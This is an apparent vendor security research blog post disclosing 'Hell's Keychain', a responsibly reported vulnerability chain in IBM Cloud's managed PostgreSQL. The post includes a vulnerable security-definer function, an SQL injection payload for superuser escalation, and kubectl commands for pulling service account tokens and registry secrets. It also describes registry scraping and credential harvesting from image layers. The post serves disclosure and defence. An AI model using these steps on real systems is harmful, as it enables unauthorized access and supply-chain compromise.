Hell’s Keychain: Supply-chain vulnerability in IBM Cloud Databases for PostgreSQL allows potential unauthorized database access

How IBM Cloud caught us exploring its infrastructure and how a hardcoded secret eventually led to build artifact access and manipulation

18 minutes read

In this blog post we will demonstrate how we were able to leverage a privilege escalation vulnerability in PostgreSQL to uncover a long-lasting secret that could have been abused to authenticate to internal IBM Cloud CI/CD services and intervene with IBM Cloud’s internal image building process—in effect potentially exposing its customers to a supply-chain attack. Wiz and IBM Cloud worked closely together to fix this issue. Read IBM Cloud's advisory here.

I greatly appreciate the partnership and professionalism of Wiz’s security research team and look forward to future collaboration. Their diligence and creativity are helping to make clouds a safer place to operate IT.

Jerry Bell, CISO of IBM Cloud

TL;DR

Wiz Research found Hell’s Keychain, a first-of-its-kind, cloud service provider supply-chain vulnerability in IBM Cloud Databases for PostgreSQL. The vulnerability consists of a chain of three exposed secrets (Kubernetes service account token, private container registry password, CI/CD server credentials) coupled with overly permissive network access to internal build servers. This attack vector could allow malicious actors to remotely execute code in customers’ environments to read and modify the data stored in the PostgreSQL database.  

After Wiz disclosed its findings, IBM Cloud patched the vulnerability for all its customers. No customer action is required. IBM Cloud stated there is no indication that IBM Cloud systems or services were exploited further or by other parties. 

Hell’s Keychain illustrates how scattered plaintext credentials across your environment can impose a huge risk on your organization by impairing its integrity and tenant isolation. Moreover, the vulnerability emphasizes the need for strict network controls and demonstrates how pod access to the Kubernetes API is a common misconfiguration that can result in unrestricted container registry exposure and scraping. 

Ultimately, Hell’s Keychain underscores the importance of proactive cloud vulnerability research, responsible disclosure, and public tracking of cloud vulnerabilities for cloud security.

Figure 1: Executing the supply-chain attack (GIF)

What is Hell’s Keychain?

In August 2022, Wiz Research found Hell’s Keychain, a supply-chain vulnerability in IBM Cloud Databases for PostgreSQL. The vulnerability consists of a chain of three exposed secrets coupled with overly permissive network access to internal build servers. To our knowledge, this is a first-of-its-kind supply-chain attack vector impacting a cloud provider’s infrastructure. Hell’s Keychain reinforces the importance of proper secrets management, network controls, and tenant isolation, especially in large and complex cloud environments.

The discovery of Hell’s Keychain was based in part on previous Wiz research that uncovered a class of PostgreSQL vulnerabilities affecting most cloud vendors, such as Microsoft Azure and Google Cloud Platform.

Cloud service provider supply-chain attack vector

Hell’s Keychain reflects a novel attack vector in the cloud, in which a cloud service provider’s build process is compromised via its supply chain. This is not a single isolated case, but rather a broader problem within the security community—we have repeatedly carried out similar attacks to Hell's Keychain across several providers.

In our experience, the recipe for a cloud service provider (CSP) supply-chain attack features two ingredients: the forbidden link and the keychain. The forbidden link represents network access—specifically, it is the link between a production environment and its build environment. The keychain, on the other hand, symbolizes the collection of one or more scattered secrets the attacker finds throughout the target environment. Although both components are individually unhygienic, they form a fatal compound when combined.

The keychain

In Hell’s Keychain, the keychain held three secrets, which were a Kubernetes service account token, a private container registry password, and CI/CD server credentials. When combined with the forbidden link between our personal PostgreSQL instance and IBM Cloud Databases’ build environment, this keychain enabled us to authenticate to IBM Cloud’s internal build servers and manipulate its artifacts.

Figure 2: Obtaining the keychain (GIF)

Getting the 1st key — Kubernetes service account token

At this early stage in the research process, our goal was the same as in every PostgreSQL-as-a-Service audit we do: to find a way to escalate our privileges within the PostgreSQL instance to a superuser. Once we become superuser, it should be relatively straightforward to execute arbitrary code on the underlying virtual machine and continue challenging internal security boundaries from there.

 In the case of IBM Cloud, we found multiple ways to do so. Some were variants of vulnerabilities that worked for us in the past on other cloud vendors (which we will soon publish), and some were unique to IBM Cloud. 

PostgreSQL privilege escalation via SQL Injection 

One of the features IBM Cloud offers its managed PostgreSQL customers is Logical Replication. It is implemented behind the scenes with numerous PostgreSQL functions in the database. One of the functions is create_subscription. This function is owned by the ibm user (a superuser in the database) and has a security definer flag, which means the function runs with the permission of the owner of the function. Looking at the code, we noticed an SQL Injection vulnerability that facilitates the execution of arbitrary queries as a superuser (the ibm user):

CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text) 
    RETURNS text 
    LANGUAGE 'plpgsql' 
    VOLATILE SECURITY DEFINER 
    PARALLEL UNSAFE 
    COST 100 
     
AS $BODY$ 
                DECLARE 
                     persist_dblink_extension boolean; 
                BEGIN 
                    persist_dblink_extension := create_dblink_extension(); 
                    PERFORM dblink_connect(format('dbname=%s', db_name)); 
                    PERFORM dblink_exec(format('CREATE SUBSCRIPTION %s CONNECTION ''host=%s port=%s password=%s user=%s dbname=%s sslmode=require'' PUBLICATION %s', 
                                               subscription_name, host_ip, portNum, password, username, db_name, publisher_name)); 
                    PERFORM dblink_disconnect(); 

The arguments passed to this function were not sanitized properly before executing the dblink_exec function. This means that we could supply our arbitrary input to the create_subscription function, thereby injecting our own SQL query into the privileged SQL query that was going to be executed as a superuser. To demonstrate this, we ran a query that showed the name of the user running it: 

INSERT INTO public.test3(data) VALUES(current_user);

We then wrote an SQL query that exploited the SQL injection: 

Figure 3: Successfully exploiting the SQL Injection to elevate to a `superuser`

The underlying query that was executed by the create_subscription was: 

CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a 
user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication 
WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);

Having acquired the power of executing queries as a superuser, we leveraged the PostgreSQL COPY statement to execute arbitrary commands on the underlying virtual machine hosting our database instance.

Figure 4: Executing the `id` command on the underlying virtual machine hosting our PostgreSQL instance

Reconnaissance

After executing code on the underlying compute instance that runs our managed PostgreSQL database, we decided to map the internal environment to understand the extent of the service’s resilience and uncover new attack surfaces.

 We invoked a reverse shell and started to explore our environment. We began by issuing our elementary recon commands: observing the machine’s process list, its active connections, and the /etc/passwd file. We then took more proactive measures and initiated a broad port scan in the internal environment of the IBM Cloud PostgreSQL service.

 This is when we received a message from IBM Cloud’s partnership team stating that our research once again triggered some alerts that caught the attention of the security team. After discussing our work and sharing our thoughts with them, they kindly gave us permission to pursue our research and further challenge security boundaries, reflecting the organization's healthy security culture.

K8s environment

With IBM Cloud’s blessing, we continued to explore the compute instance’s environment. While examining  the environment variables, we noticed a few that indicated we were running inside a Kubernetes pod container (e.g. the POD_NAME variable): 

KUBERNETES_PORT=tcp://172.21.0.1:443 
POD_NAME=c-84aa5d80-ef9b-440e-b4f8-31fd782118b2-m-1 
KUBERNETES_SERVICE_PORT=443 

The fact that we were operating in a Kubernetes cluster got us wondering whether the cluster was dedicated to our account or shared between customers. We maintained our recon efforts and found a Kubernetes API token in the /var/run/secrets/kubernetes.io/serviceaccount/token file. Using that token, we could access the Kubernetes API.

Subsequently uploading the kubectl utility to the instance allowed us to use its features and perform operations more rapidly. We then ran the can-i command to inspect our current privileges and available resources and saw that we had access to secrets, pods, and custom IBM Cloud resources in our namespace:

./kubectl auth can-i --list 
Resources                                          Verbs 
selfsubjectaccessreviews.authorization.k8s.io      [create] 
selfsubjectrulesreviews.authorization.k8s.io       [create] 
secrets                                            [get create update] 
pods                                               [get patch update list] 
endpoints                                          [get patch update] 
configmaps                                         [get patch] 
... 
deployments.apps                                   [get] 
replicasets.apps                                   [get] 
statefulsets.apps                                  [get] 
formations.crd.compose.com                         [get] 
backups.crd.compose.com                            [patch delete list get] 
buckets.crd.compose.com                            [patch] 
podsecuritypolicies.policy                         [use] 
podsecuritypolicies.policy                         [use] 
securitycontextconstraints.security.openshift.io   [use] 
recipes.crd.compose.com                            [watch get update create patch list delete] 

When we listed the pods in our namespace, we saw dozens of other pods running more PostgreSQL instances. They all appeared to belong to our account:

Figure 5: Using `kubectl` to list available pods

At this stage of our research, we were still unsure whether namespace separation was the only security barrier used to enforce tenant isolation, so we kept digging.

Getting the 2nd key — Container registry password

When creating a Kubernetes pod with an image from a private container registry, it is necessary to supply the imagePullSecrets field in the pod configuration, which references a secret holding the credentials for the container registry.

Container registry scraping

Over the past year, we have experimented with container registry scraping as a technique to help us move laterally within cloud environments. It has proven to be effective on several occasions.

In K8s clusters, container registry scraping is a reliable technique for performing lateral movement since it exploits a highly prevalent misconfiguration we’ve observed across CSPs and customers’ cloud environments. The first step is contacting the K8s server and finding the container registry address. Then, you have a couple of options depending on the registry’s configurations:

  • If the registry is public, you can start pulling images and scanning them for internal source code, artifacts, and scattered credentials.

  • If the registry requires authentication but you can successfully retrieve imagePullSecrets, you can proceed with image pulling and scanning.

    • Failure to retrieve imagePullSecrets, however, prevents you from moving forward in the process.

In Hell’s Keychain, the container registry required authentication. Although we didn’t have list permission in our namespace, we did have get permission. This meant that we could only get secrets if we knew their name. In an attempt to find these names in our cluster, we listed the pods׳ configurations with the following command:

kubectl get pods -o json

We found that IBM Cloud pulled custom images from a private container registry whose credentials were found in the pipeline secret.

"imagePullSecrets": [ 
          { 
            "name": "pipeline" 
          } 

Now that we had the secret’s name, we could get its content.

kubectl get secrets -o json pipeline  
{  
    "apiVersion": "v1",  
    "data": {  
        ".dockerconfigjson": "**REDACTED**"  
    },  
    "kind": "Secret",  
    "metadata": {  
        "annotations": {  
            "meta.helm.sh/release-name": "**REDACTED**",  
            "meta.helm.sh/release-namespace": "default"  
        },  
        "creationTimestamp": "2022-04-19T11:54:23Z",  
        "labels": {  
            "app.kubernetes.io/managed-by": "Helm"  
        },  
        "name": "pipeline",  
        "namespace": "3337e1322e274c2298c0d78f3b2c0d60",  
        "resourceVersion": "1993710167",  
        "uid": "076f9687-8c1d-4674-a9bf-bd869b25a6b5"  
    },  
    "type": "kubernetes.io/dockerconfigjson"  
}  

After Base64-decoding the .dockerconfigjson property, we revealed a set of four credentials that could be used to access multiple container registries:

{  
    "auths": {  
        "de.icr.io": {  
            "auth": "**REDACTED**"  
        },  
        "private.de.icr.io": {  
            "auth": "**REDACTED**"  
        },  
        "registry.ng.bluemix.net": {  
            "auth": "**REDACTED**"  
        },  
        "us.icr.io": {  
            "auth": "**REDACTED**"  
        }  
    }  
}  

Our query of IBM Cloud's IAM API revealed that this was an API key capable of accessing IBM Cloud’s Container Registry Images that appeared to have read-write authorization!

Figure 6: Querying IBM Cloud’s IAM API regarding the retrieved key

We then used the ibmcloud-cli to log in to the specific container registry with this key.

Figure 7: Using the retrieved key to log in via ibmcloud-cli
Figure 8: Using the retrieved key to log in to the container registry
Figure 9: Listing the namespaces available with the retrieved key

Despite the alleged read-write permissions, when we attempted to use the key to push a new dummy image to the container registry, we encountered a permission denied error. The key’s description was unfortunately (for us) inaccurate.

Figure 10: Failing to push a new image to the container registry

Although these findings did not pose an immediate threat to IBM Cloud’s customers, we still considered them severe. Had a malicious actor obtained these credentials, they could have pulled and explored hundreds of images belonging to IBM Cloud’s managed database services.

Container images typically hold proprietary source code and binary artifacts that are the company’s intellectual property. They can also contain information that an attacker could leverage to find additional vulnerabilities and perform lateral movement within the service’s internal environment. Finally, container images often include sensitive secrets that can compromise other resources in the victim’s environment.

Getting the 3rd key — CI/CD server credentials

Plaintext secrets in container images’ metadata

Each container that is deployed in our environment is based on a custom image that was built by IBM Cloud. After seeing the potential impact of misconfigured credentials in the previous step, we concluded that our next move should be scanning the images for secrets that could have been forgotten during the build process. Although we had access to hundreds of images, we only pulled those we found running in our namespace (postgresql-db-12.7, etcd-mgmt-3.2.7, etcd-portal-3.2.7, etcd-portalmgmt-3.2.7, postgresql-mgmt-12.7) and utilized Yelp's detect-secrets tool to scan them for secrets.

In order to comprehensively scan for secrets, we unpacked the images and examined the combination of files that made up each image. Container images are based on one or more layers; each may inadvertently include secrets. For example, if a secret exists in one layer but is deleted from the following layer, it would be completely invisible from within the container. Scanning each layer separately may therefore reveal additional secrets. Owing to this approach, we discovered multiple sensitive secrets in overlooked files:

./etcd-db-3.2.7/5f58fdb011ecb91851e15da48eb42753754db46690c657537007bcc1376ea7ff.json  
./etcd-mgmt-3.2.7/033093941e82efee469a858f99a8e6dfa33110da15b362bf3cab418b75cef1bd.json  
./etcd-portal-3.2.7/7c57a500fac4fc4bf9cdb56e1e91a80da691b68f770f12c2eb2d0dc673f21417.json  
./etcd-portalmgmt-3.2.7/4f4a7c7fd8d3d5f80c5169a5213fe3654bc63911c160a26b69afc00c0de14869.json  
./postgresql-db-12.7/f6cb8f69fe9743f19bce248a668213031db4de469af44cf8a20c59b881fe5807.json  
./postgresql-mgmt-12.7/9ffe9a0b853bc33ec6faf354017273624f9f2604f53ed89b5814c2cdfd3afe0a.json  

These files are the images’ manifest files and contain a history section documenting historical commands that were executed during the image build process. The commands include pulling artifacts from IBM Cloud internal repositories, where the password for the internal repository was provided as a command-line parameter.

Here is one of the build commands as it originally appeared in the container images’ metadata history section: 

**REDACTED**_REPO_GENERIC=**REDACTED** 
**REDACTED**_TOKEN=**REDACTED** 
**REDACTED**_USERNAME=**REDACTED**@nomail.relay.ibm.com 
FTP3PASS=**REDACTED** FTP3USER=**REDACTED**@us.ibm.com 
/bin/sh -c curl -sLO  https://`echo ${**REDACTED** _USERNAME} | sed 
s/@/%40/g`:${**REDACTED** _TOKEN}@**REDACTED** ${**REDACTED** 
_REPO_GENERIC}/get-pip.py && python3 get-pip.py && rm get-pip.py  

Using these files, we revealed the credentials for several IBM Cloud internal services, including:

  • FTP credentials

  • Internal artifact repository credentials

With these keys gathered on the keychain, we knew which servers we could infiltrate. But this keychain was meaningless without the required network access.

The forbidden link

In order to determine which servers were most relevant to the image build process, we went back to examine the historical commands that were used to build the container’s image and learn which artifacts were involved. When we tried to access these servers from the machine hosting the PostgreSQL instance, we were shocked to learn that we had network access to internal IBM Cloud build servers! We then proceeded to authenticate to them using the artifact repository credentials, and in doing so successfully uncovered the forbidden link.

Combining the ingredients

The only way to determine whether the credentials we obtained allowed us to perform write operations against the repositories hosting the artifacts, was to simply check.

To test our permissions, we created a few files in the repositories used in the build process of the PostgreSQL image. This proved that we could overwrite arbitrary files in the packages that would have been installed on every PostgreSQL instance, establishing the supply-chain attack path.

Summary

Our research into IBM Cloud Databases for PostgreSQL reinforced what we learned from other cloud vendors—that modifications to the PostgreSQL engine effectively introduced new vulnerabilities to the service. These vulnerabilities could have been exploited by a malicious actor as part of an extensive exploit chain culminating in a supply-chain attack on the platform.

In Hell’s Keychain, we used container registry scraping to recover internal source code and credentials, eventually gaining a key granting read-write access to internal trusted repositories.

Overly permissive network access also proved dangerous. By uncovering the forbidden link between IBM Cloud’s build environment and its customers’ production environments, we leveraged the necessary credentials to carry out Hell’s Keychain.

Finally, we were reminded of the value of secret scanning. Although in previous cases our team managed to violate tenant isolation by exploiting vulnerabilities in neighbor-tenant instances or the control plane, in the case of IBM Cloud Databases for PostgreSQL, the Achilles heel was improper secrets management. Regardless of how strong your organization’s security measures are, it faces a huge risk if plaintext credentials are scattered across its environment.

Lessons Learned

1.     Constantly monitor your environment for scattered secrets

Forgotten secrets in cloud environments are a common security issue. These secrets are usually cloud access keys, passwords, CI/CD credentials, and API access tokens. A significant part of secrets are relics from the services' build and deployment processes. During our last year of research across multiple cloud vendors, we have found sensitive secrets in numerous places, including Linux bash history and journal files that have remained in the servers' image since the build process. In addition, we learned that this issue is not unique to cloud computing—in the absence of best practices on how to deploy code or artifacts to cloud storage buckets, we often witness customers who accidentally upload their git (.git) and deployment-related files such as CircleCI configuration (.circleci/config.yml) to their publicly accessible S3 buckets. This action has the potential to expose the source code and access keys to anyone on the Internet.

2.     Ensure your production environment has strict network controls

An established connection between the internet-facing environment and the organization’s internal network enables attackers to gain a deeper foothold and maintain persistence. These internal environments are typically less strictly configured than production environments.

In Hell’s Keychain, the lack of adequate network controls allowed us to uncover the forbidden link, a vital ingredient of a supply-chain attack. This misconfiguration is not unique to IBM Cloud, as we have observed it across several cloud providers and customers. In our view, this issue is overlooked in industry discussions and cloud security solutions.

3.     Configure your container registry to prevent malicious actors from scraping it

Misconfigured container registries are a prevalent issue across cloud providers’ and customers’ environments. By using container registry scraping, attackers can gain the tools required to move laterally throughout the environment. Make sure your container registry solutions enforce proper access controls and scoping.

Responsible Disclosure

We disclosed our findings to IBM Cloud in the form of a three-part report. IBM Cloud rapidly investigated and fixed the vulnerabilities and security issues we discovered. We enjoyed working with IBM Cloud’s security team which took the issues very seriously by addressing them promptly and professionally. 

Disclosure Timeline

19/04/2022 –Wiz started researching into IBM Cloud Databases
19/04/2022 – Wiz found multiple security issues in IBM Cloud Databases for PostgreSQL
20/04/2022 – IBM Cloud’s security team detected Wiz’s activity and asked to halt the research
24/04/2022 – Wiz shared a detailed report on the issues found
25/05/2022 – IBM Cloud acknowledged the report
14/07/2022 – IBM Cloud allowed Wiz to proceed with its research
24/08/2022 – Wiz reported the Kubernetes-related security issues
25/08/2022 – Wiz reported the secrets-related security issues
03/09/2022 – IBM Cloud fully mitigated all the reported issues

Tracking cloud vulnerabilities

Today, there is no clear process around cloud vulnerabilities enforced by the security community. Cloud vulnerabilities are typically not issued CVEs, so they are very hard for customers to track. Recently, researchers from Wiz along with other cloud security community members initiated the Open Cloud Vulnerability & Security Issue Database to help cloud users and defenders monitor and track cloud vulnerabilities. Hell's Keychain was added to the database as part of this effort. If you are interested in contributing, you can check out the OpenCVDB GitHub

Stay in touch!

Hi there! We are Ronen Shustin (@ronenshh), Shir Tamari (@shirtamari), Nir Ohfeld (@nirohfeld), and Sagi Tzadik (@sagitz_) from the Wiz Research Team (@wiz_io). We are a group of veteran white-hat hackers with a single goal: to make the cloud a safer place for everyone. We primarily focus on finding new attack vectors in the cloud and uncovering isolation issues in cloud vendors. We would love to hear from you! Feel free to contact us on Twitter or via email: research@wiz.io.

Secure everything you build and run in the cloud

Organizations of all sizes and industries use Wiz to rapidly identify and remove the most critical risks in AWS, Azure, GCP, OCI, and Kubernetes so they can build faster and more securely.

Continue reading

Wiz integrates with AWS Security Hub to help you better manage your AWS security posture

New integration enables AWS customers to send Wiz security issues detected in AWS resources to Security Hub.

Wiz integrates with Amazon Security Lake to improve cloud security through cloud security data sharing

New integration enables customers to consolidate security logs, run investigations and analyze security metrics in their customer-owned data lake.

Wiz and BigID expand partnership to extend visibility and control for enterprise data to prevent breaches

Deeper partnership accelerates end-to-end cloud-native data protection from discovery to enforcement.